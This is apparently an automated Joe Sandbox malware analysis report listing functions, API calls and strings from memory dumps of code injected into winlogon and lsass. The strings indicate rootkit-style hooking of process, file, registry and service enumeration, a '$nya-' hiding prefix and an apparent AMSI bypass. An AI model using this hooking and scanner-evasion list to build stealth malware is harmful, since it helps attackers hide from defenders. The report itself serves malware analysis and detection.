HeapFree.KERNEL32 ref: 000001E8589E1DAA

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: ed80407fb5daa8a89b2c2114cd03d75d49824f512bc49edaa853b071e3ef9c2a
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: C6115E21721B80C6EB15DB66E80419DBBA0FB88FD1F594135DE8E57765DF38D4928300

Function 000001E858981D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E858981D69
HeapAlloc.KERNEL32 ref: 000001E858981D77
GetProcessHeap.KERNEL32 ref: 000001E858981D9C
HeapFree.KERNEL32 ref: 000001E858981DAA

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 65735039a02ae73be7847ccbd44b325163db6eddf13c8e6fb7e3bc43dd32b840
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 3E115B21B21B80C5EB14DB66E80429EB7A1FB88FD0F584136DE4E57765EF38D4828700

Function 000001E8589B1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589B126A
HeapAlloc.KERNEL32 ref: 000001E8589B1279
GetProcessHeap.KERNEL32 ref: 000001E8589B1293
HeapAlloc.KERNEL32 ref: 000001E8589B12A4

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: baf0a454103307751983532087e6c2e91025ef6167afbcaf99ff78595f6723a6
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 4BE03931721644DBE7148B62D80C389BBE1FB88B05F468024CD0907350EF7EC4998740

Function 000001E8589E1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589E126A
HeapAlloc.KERNEL32 ref: 000001E8589E1279
GetProcessHeap.KERNEL32 ref: 000001E8589E1293
HeapAlloc.KERNEL32 ref: 000001E8589E12A4

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 1b4ccb1bc8a883ed5caf5af7c523af9e889c3ade8bb8c485efe14556e0c68a93
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 6FE03931721644DAE7198B62D848389BAE1EB88B06F458024CD0907350EF7DD4A98740

Function 000001E858981264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E85898126A
HeapAlloc.KERNEL32 ref: 000001E858981279
GetProcessHeap.KERNEL32 ref: 000001E858981293
HeapAlloc.KERNEL32 ref: 000001E8589812A4

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 6aab80aa31e4e9af0cd27b26063a3309ee8e182dddeca6e59f80219662625ab2
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: C9E03931721644DAF7248B62D80838AB6E2EB88B05F448025CE0907360EF7DC4998740

Function 000001E8589B1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589B1006
HeapAlloc.KERNEL32 ref: 000001E8589B1015
GetProcessHeap.KERNEL32 ref: 000001E8589B1028
HeapAlloc.KERNEL32 ref: 000001E8589B1037

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 1d3fa2e056d8ffc572ec0c138c18147de1488bc5b395315a6212ea09dd4e57df
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: A9E0ED71721544DBE7189B62D80C39DBBA1FF88B15F458035CD0907310EE3984999710

Function 000001E8589E1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589E1006
HeapAlloc.KERNEL32 ref: 000001E8589E1015
GetProcessHeap.KERNEL32 ref: 000001E8589E1028
HeapAlloc.KERNEL32 ref: 000001E8589E1037

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 32e64b29c603ca915b04ca0dc8e3b28af83467c163aa69cd46ed666c4a3aaf7e
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 02E0ED71721544DAE7199B62D84429DB6A1FF88B16F458035CD0907350EE3894A99610

Function 000001E858981000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E858981006
HeapAlloc.KERNEL32 ref: 000001E858981015
GetProcessHeap.KERNEL32 ref: 000001E858981028
HeapAlloc.KERNEL32 ref: 000001E858981037

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: c66185fb35e27ad3198e93e413a3999b506b096cf0b8d15a268b5e0317782989
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 4DE0ED71721544DAF7289B62D80429EB6A2FF88B15F448035CE0907320FE3884999610

Analysis Process: lsass.exePID: 640, Parent PID: 5068COMMON

Execution Graph

Execution Coverage:	2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1395
Total number of Limit Nodes:	11

Executed Functions

Function 00000140AE8627E8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryDirectoryFileEx.NTDLL ref: 00000140AE862861
GetFileType.KERNEL32 ref: 00000140AE8628CC
StrCpyW.SHLWAPI ref: 00000140AE8628E5

Part of subcall function 00000140AE863F88: StrCmpNIW.SHLWAPI(?,?,?,00000140AE86272F), ref: 00000140AE863FA0

Strings

\\.\pipe\, xrefs: 00000140AE8628D7

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: File$DirectoryQueryType
String ID: \\.\pipe\
API String ID: 4175507832-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 5daaeb0bb4aa518c6dce806cbe9e5c24b9ba21a6c2de6fb8d116667fb054e964
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: C671C432690B8141E7769F2B98443EAA794F38DBE5F640026DF4D57BA9DE74CE00C781

Function 00000140AE862300 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 00000140AE86232B
StrCmpNIW.SHLWAPI ref: 00000140AE86239A

Part of subcall function 00000140AE8635C8: GetProcessHeap.KERNEL32(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE8635EB
Part of subcall function 00000140AE8635C8: HeapAlloc.KERNEL32(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE8635FE
Part of subcall function 00000140AE8635C8: StrCmpNIW.SHLWAPI(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE863673
Part of subcall function 00000140AE8635C8: GetProcessHeap.KERNEL32(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE8636D9
Part of subcall function 00000140AE8635C8: HeapFree.KERNEL32(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE8636E7

Strings

$nya-, xrefs: 00000140AE862393
S, xrefs: 00000140AE8624BB

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFreeInformationQuerySystem
String ID: $nya-$S
API String ID: 722747020-3492252248
Opcode ID: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
Instruction ID: 10c93ae40967d366460c1af3af3ae598b1b5004c114e359773f8e4e7b576045f
Opcode Fuzzy Hash: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
Instruction Fuzzy Hash: 9851AC32B5076482E762CB2B9A40AEDA3A4F74C7A8F248465DF4D17B74DB39CC41C381

Function 00000140AE861E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000140AE861E7F

Part of subcall function 00000140AE8622A8: GetModuleHandleA.KERNEL32(?,?,?,00000140AE861EB1), ref: 00000140AE8622C0
Part of subcall function 00000140AE8622A8: GetProcAddress.KERNEL32(?,?,?,00000140AE861EB1), ref: 00000140AE8622D1

CreateThread.KERNELBASE ref: 00000140AE862043
TlsAlloc.KERNEL32 ref: 00000140AE862049
TlsAlloc.KERNEL32 ref: 00000140AE862055
TlsAlloc.KERNEL32 ref: 00000140AE862061
TlsAlloc.KERNEL32 ref: 00000140AE86206D
TlsAlloc.KERNEL32 ref: 00000140AE862079
TlsAlloc.KERNEL32 ref: 00000140AE862085

Strings

NtQuerySystemInformation, xrefs: 00000140AE861EA5
NtResumeThread, xrefs: 00000140AE861EC2
NtEnumerateKey, xrefs: 00000140AE861F19
ntdll.dll, xrefs: 00000140AE861E8D
EnumServicesStatusExW, xrefs: 00000140AE861F71, 00000140AE861F92
pdh.dll, xrefs: 00000140AE861FD7, 00000140AE861FF8
NtDeviceIoControlFile, xrefs: 00000140AE861FB6
NtEnumerateValueKey, xrefs: 00000140AE861F36
AmsiScanBuffer, xrefs: 00000140AE862012
NtQueryDirectoryFileEx, xrefs: 00000140AE861EFC
PdhGetRawCounterArrayW, xrefs: 00000140AE861FD0
amsi.dll, xrefs: 00000140AE862019
NtQueryDirectoryFile, xrefs: 00000140AE861EDF
PdhGetFormattedCounterArrayW, xrefs: 00000140AE861FF1
advapi32.dll, xrefs: 00000140AE861F57, 00000140AE861F78
sechost.dll, xrefs: 00000140AE861F99
EnumServiceGroupW, xrefs: 00000140AE861F50

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 41dc577e75bb4b21c8b492373be71e11fafd3efd7900aa5ae2dddf2e0a44fe51
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 12517DB0190B4AA5FB03EB6BEC407D47722B74C3A5FB405529E0D13675DE788A5AC3D2

Function 00000140AE861AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFinalPathNameByHandleW.KERNELBASE ref: 00000140AE861AF4
StrCmpNIW.KERNELBASE ref: 00000140AE861B0E
lstrlenW.KERNEL32 ref: 00000140AE861B1D
StrCpyW.SHLWAPI ref: 00000140AE861B32

Strings

\\?\, xrefs: 00000140AE861B02

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 197f69b0064b74f6fe5d1c82fd5d8c120420200035a2451899f7178f69e32035
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: D7F03C7234478592EB219B22F9843996361FB48BA8FA440259F4D47975DE7CCA88CB41

Function 00000140AE861E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000140AE861E47
GetProcAddress.KERNEL32 ref: 00000140AE861E57
SleepEx.KERNELBASE ref: 00000140AE861E67

Strings

AmsiScanBuffer, xrefs: 00000140AE861E50
amsi.dll, xrefs: 00000140AE861E40

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 8d31a156479c45965128d2f6ee04712fcb7c3d3bea6b81f0a861a1b27b9b627e
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: D5D04230691B0095FA0A6B12E8947943262AFACB21FB40415CA0E032B0DE3C9D59D3D2

Function 00000140AE863A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000140AE863A35
PathFindFileNameW.SHLWAPI ref: 00000140AE863A44

Part of subcall function 00000140AE863F88: StrCmpNIW.SHLWAPI(?,?,?,00000140AE86272F), ref: 00000140AE863FA0

Part of subcall function 00000140AE863EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863EDB
Part of subcall function 00000140AE863EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863F0E
Part of subcall function 00000140AE863EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863F2E
Part of subcall function 00000140AE863EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863F47
Part of subcall function 00000140AE863EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863F68

CreateThread.KERNELBASE ref: 00000140AE863A8B

Part of subcall function 00000140AE861E74: GetCurrentThread.KERNEL32 ref: 00000140AE861E7F
Part of subcall function 00000140AE861E74: CreateThread.KERNELBASE ref: 00000140AE862043
Part of subcall function 00000140AE861E74: TlsAlloc.KERNEL32 ref: 00000140AE862049
Part of subcall function 00000140AE861E74: TlsAlloc.KERNEL32 ref: 00000140AE862055
Part of subcall function 00000140AE861E74: TlsAlloc.KERNEL32 ref: 00000140AE862061
Part of subcall function 00000140AE861E74: TlsAlloc.KERNEL32 ref: 00000140AE86206D
Part of subcall function 00000140AE861E74: TlsAlloc.KERNEL32 ref: 00000140AE862079
Part of subcall function 00000140AE861E74: TlsAlloc.KERNEL32 ref: 00000140AE862085

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: a38a35cac72c52bd20d8c2cf22f6dff54f2e4a64fc6af371d7a537c333d09727
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 861121316D0B8191F762A723A5457D92291A79C3A6FB041199F0E835F1DF78CC44D6D2

Function 00000140ADFC2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00000140ADFC302E

Memory Dump Source

Source File: 00000009.00000003.2361554206.00000140ADFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_140adfc0000_lsass.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 9fcaa5963dbb178648860b710fd825bb80e08b252c09e535425a199a505297ec
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 0B91E572B213589BDB558F26D4007AB73D3FB59BD8F6881249F4947798DA34D823D700

Function 00000140AE861BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000140AE861724: GetProcessHeap.KERNEL32 ref: 00000140AE86172F
Part of subcall function 00000140AE861724: HeapAlloc.KERNEL32 ref: 00000140AE86173E
Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617AE
Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617DB
Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE8617F5
Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861815
Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE861830
Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861850
Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE86186B
Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86188B
Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE8618A6
Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8618C6

SleepEx.KERNELBASE ref: 00000140AE861BDF

Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE8618E1
Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861901
Part of subcall function 00000140AE861724: RegCloseKey.ADVAPI32 ref: 00000140AE86191C
Part of subcall function 00000140AE861724: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86193C
